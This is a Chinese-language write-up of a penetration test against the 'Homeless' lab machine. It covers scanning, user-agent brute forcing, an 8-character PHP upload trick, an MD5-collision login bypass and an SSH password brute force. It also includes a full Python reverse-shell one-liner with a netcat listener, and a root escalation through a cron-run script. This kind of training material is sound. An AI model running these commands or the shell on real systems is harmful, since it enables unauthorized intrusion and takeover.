热文# 原创

Homeless靶场渗透笔记 | 黑客靶场

本文作者:NeGoo - 重生信息安全

加载开启镜像,开整

74602-o23scyevejl.png

查看本机的IP地址段,然后进行扫描发现主机
60871-g367ue34qcp.png
root@kali:~# nmap -p- -A -O 192.168.195.134
扫描发现开放两个端口22、80,访问80发现是个demo,在网页中寻找信息
47434-hrq0egzonof.png
34898-sc9owvggu2.png

查看源代码未发现有效的信息,查看爬虫文件

89488-6oj45quh9bq.png
33688-6cq47edzycg.png
先扫一波再说
使用工具 - dirsearch
https://github.com/maurosoria/dirsearch

44034-797a2qjkgb.png
并没有什么有用的信息,发现ua会原封不动的展示在回显,想到之前出题人提示rockyou,可能用字典爆破ua会有收获
64464-86ocid553zq.png
44523-u4bl5r4v6vg.png

操作一:爆破

进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz
进行解压:
gzip -d rockyou.txt.gz

64086-s1wlsjlpmss.png
只要ua里包括cyberdog就可以得到提示页面.

操作二:脑洞大开出奇迹

还有一种操作时发现网页隐藏了一个图片,打开后将标题输入ua就可得到提示! 要我估计把头挠秃了也想不出来

95084-krsed04bgpi.png
81128-rgypo9zi7e.png

打开是个上传页面
28500-2pn6xqp44sm.png
经过上传测试发现,可以上传任何文件,但是文件内容不能超过8个字符。
21225-zhwsdt4n0v.png
35378-1h9tcjvk7hp.png

此时可以用到php代码格式的小技巧

1. php代码格式

PHP代码有下列几种格式,在此推荐使用第一种格式。1、标准格式,以 <?php 开头,以 ?> 结束。例如:
<?php
echo"welcome!";
?>

2、短标签,以 <? 开头,以 ?> 结束。例如:
<?
print "Thisis a PHP example.";
?>
注:短标签的启用必须启用php.ini中的配置项short_open_tag。使用短标签输出一段文字的话,还可以使用下列简介方式:
<?="This is a PHP example."; ?>

3、脚本。例如:

<script language="php">
print "Thisis a PHP example.";

相当于

<?php echo "This is a PHP example."; ?>

2. php执行运算符

链接:php执行运算符
经过测试,可以执行命令,但是仅局限于<=2个字符的命令,如ls、ps,发现下一步提示
75198-sk5b0u9t72.png

98820-1cpb9zbic9h.png
发现新文件,访问测试
67666-gtehl1mzg1u.png

90169-shq8i6ze93.png
扫描发现备份文件
06948-y9ocbeik35r.png
值必须相等
91141-46vv4bjksl8.png
40439-fx4fal0q1zg.png
77928-z6ea9b5zym8.png
有个python工具可以生成N个MD5相同的文件,但是此工具仅可以在*unix上进行运行。
https://github.com/thereal1024/python-md5-collision

git clone https://github.com/thereal1024/python-md5-collision.git
另外需要安装依赖才能正确运行,需要root权限和python2/3 程序
apt-get update

60414-hwchfjvnfbr.png
17153-a66kotj2ukv.png

Curl用法之--data-urlencode

5) --data-urlencode key=value

--data-urlencode参数等同于-d,发送 POST 请求的数据体,区别在于会自动将发送的数据进行 URL
编码。
先对数据进行URL编码,再发送给HTTP服务器,即对表单中的字段值进行URL编码后再发送。为了兼容CGI,格式为“name+分隔符+content”,如下所示:

name=content,将content进行URL编码,然后提交给HTTP服务器
=content,同上,只是未给出引用的name content,同上,注意content中不能包含=和@符号
name@filename,从文件filename中读取数据(包括换行符),将读取的数据进行URL编码,然后提交给HTTP服务器
@filename,同上
root@kali:/home/tools/python-md5-collision#curl--data-urlencode 
username@out_test_000.txt--data-urlencodepassword@out_test_001.txt--data-urlencode code@out_test_002.txt--data-urlencode"remember=1&login=Login"
http://192.168.195.134/d5fa314e8577e3a7b8534a014b4dcb221de823ad/index.php-i 
-i参数打印出服务器回应的HTTP标头。

65885-8h8u2qqxuj7.png

返回的请求头中有Session值,需要修改cookie进入admin.php ,第二天了IP变了
48644-6v7liwedtf3.png
93976-2lznkyi63ts.png
27201-fyhe3f338h7.png
89916-77d5i42f0ab.png

使用python进行反弹shell 网站执行

python-c"import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.195.128',8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

18328-9s8ov6tvemk.png
攻击机执行:
nc -lvp 8888
71394-ap0wel1010h.png
Getshell进行信息搜集。发现 /home/downfall 用户目录下存在todo文件,查看该目录的其他文件发现隐藏文件,但没有权限。可以对此用户进行爆破,然后查看文件
69901-iznisxzkpxo.png
靶场提示里有线索,以sec开头创造字典,前期信息搜集其ssh端口为22,进行爆破。

46124-tfphmk8crds.png

爆破成功得到密码 secretlyinlove
14160-f09obojrl8e.png
登录进行信息搜集,得到提示需要取得 root 权限。
56344-whcwi3x1wsd.png
81845-uoj9aos4z6k.png

42662-oo66kyfgt2.png
23356-4vkkg1yg89n.png
经过分析发现,文件/lib/logs/homeless.py所有者为 downfall,但是邮件里提到root用户会每隔一段时间运行此脚本。思路就是以downfall用户修改/lib/logs/homeless.py文件,饭后root用户会运行修改后的文件,以此反弹shell得到提升root权限。
45853-14mrhgdzisx.png
66812-nzakunu87v.png

GetShell !
17340-gz7ra90mwkc.png

原创文章,作者:运营,如若转载,请注明出处:http://www.csxxaq.com/yc/1978.html
Docker 容器逃逸漏洞 (CVE-2020-15257)复现
« 上一篇 01-05
从WEB弱口令到获取集权类设备权限的过程
下一篇 » 03-22

相关推荐

推荐CS4.1真的有后门吗?

文章来源:酒仙桥六号部队前言CS是什么?可能是某款历史久远的第一人称射击游戏,也可能是某个电影。由于法律原因我们这里并不指出CS是什么,但网络江湖上一直流...